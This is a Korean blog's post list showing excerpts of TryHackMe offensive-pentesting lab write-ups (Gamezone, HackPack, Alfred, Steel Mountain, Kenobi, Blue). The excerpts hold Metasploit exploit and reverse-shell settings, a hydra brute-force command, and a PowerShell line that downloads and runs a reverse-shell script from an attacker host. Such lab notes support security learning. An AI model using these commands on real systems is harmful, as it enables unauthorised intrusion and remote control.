본문 바로가기

병뚜

Notice

Recent Posts

Popular Posts

Recent Comments

Link

Calendar

Tags

더보기

Archives

Visits

Today

Yesterday

전체 글

DOM-XSS writeup 보호되어 있는 글입니다.

THM Offensive Pentesting - Gamezone

Play/THM 2023. 7. 20. THM Offensive Pentesting - Gamezone TASK 6 Using the CMS dashboard version, use Metasploit to find a payload to execute against the machine. Webmin version : 1.580 vulun : CVE-2012-2982 use exploit/unix/webapp/webmin_show_cgi_exec set RHOSTS set RPORT 10000 set SSL false set USERNAME agent47 set PASSWORD videogamer124 set payload cmd/unix/reverse_python set LHOST set LPORT 10000 exploit

THM Offensive Pentesting - HackPack

Play/THM 2023. 7. 19. THM Offensive Pentesting - HackPack HackPack은 따로 포스팅 안하려고 했는데.. 이렇게라도 적지 않으면 기억나지 않을 듯 하여 포스팅한다. (실습 도중 어택박스가 계속 끊겨서 타겟 IP, 어태커IP 변경이 잦다) TASK 2 1. Login 로그인을 위해 hydra 사용 THM 지시 : hydra -l -P /usr/share/wordlists/ http-post-form 그런데 이대로 작성하면 안되고, 뒤에 좀 더 덧붙여주어야 함. wordlist는 kali에 기본적으로 주어지는 rockyou.txt를 사용했고, http-post-form 뒤에 덧붙일 것. * hydra 사용법은 여기를 참고하자 hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.78.71 http-post-form..

THM Offensive Pentesting - Alfred

Play/THM 2023. 7. 18. THM Offensive Pentesting - Alfred TASK 1 Initial Access 1. Jenkins 포트번호 8080 접속, Jenkins 로그인 화면 확인 무차별대입으로 로그인 2. Execute shell Jenkins는 빌드 시 특정 쉘 스크립트가 실행되도록 하는 기능이 있는 듯. 찾아보니까 project > Build > Execute shell THM 지시대로 command에 쉘 스크립트 작성 Invoke-PowerShellTcp.ps1는 여기에서 다운받을 수 있음. powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress y..

THM Offensive Pentesting - Steel Mountain

Play/THM 2023. 7. 18. THM Offensive Pentesting - Steel Mountain TASK 1 nmap 80번 포트 열린 것 확인, 웹 페이지 접속 이름 확인. TASK 2 Initial Access 80 이외에 8080도 웹 서버 실행하고 있음 해당 웹서버는 Rejetto Http File Server임 2.3 버전에 CVE-2014-6287 취약점이 존재한다. (링크) 간단히 설명하자면, 검색 기능에서 %00를 이용하여 임의 프로그램을 실행할 수 있는 취약점임. metasploit 통해 exploit 해보자. 1. 모듈 2. use exploit/windows/http/rejetto_hfs_exec show options # 필수 옵션 셋팅 set RHOSTS {target ip} set RPORT {tartget port} set SRVHOST 0.0.0.0 set SRVPORT..

THM Offensive Pentesting - Kenobi

Play/THM 2023. 7. 17. THM Offensive Pentesting - Kenobi TASK 2-3. 침투 0. port scan 1. Samba Windows의 SMB 프로토콜을 구현하여 파일 및 프린터 공유를 가능하게 함 * 대부분의 Linux 배포판에 smbclient가 설치되어 있음 1) nmap nmap -p {port: 445 or 139} --script=smb-enum-shares.nse,smb-enum-users.nse {ip} *smb-enum-shares.nse : Samba 서버에서 공유된 디렉터리(Shares)를 열거 *smb-enum-users.nse : Samba 서버에 등록된 사용자 계정 열거 2) smbclient smbclient -R smb://{ip}/{user} # -R : recursive mode, 원격 서버의 모든 디렉터리 및 하위 디렉터리를 ..

AWS IAM - OIDC, SAML 보호되어 있는 글입니다.

THM Offensive Pentesting - Blue

Play/THM 2023. 6. 17. THM Offensive Pentesting - Blue Task 1 - 타겟은 ms 관련 취약점을 가지고 있음 - site:https://learn.microsoft.com/en-us/security-updates/securitybulletins/ windows7 445 - MS17-010 취약점 (링크) Task 2 msfconsole use exploit/windows/smb/ms17_010_eternalblue set rhosts set payload windows/x64/shell/reverse_tcp exploit Task 3 1) meterpreter shell 진입 - 백그라운드 전환 (ctrl + z), background sesions 1 - meterpreter shell로 진입하기 위해 shell_to_meterpreter 이용 use p..

이전 1 2 3 4 5 6 7 8 ··· 46 다음

티스토리툴바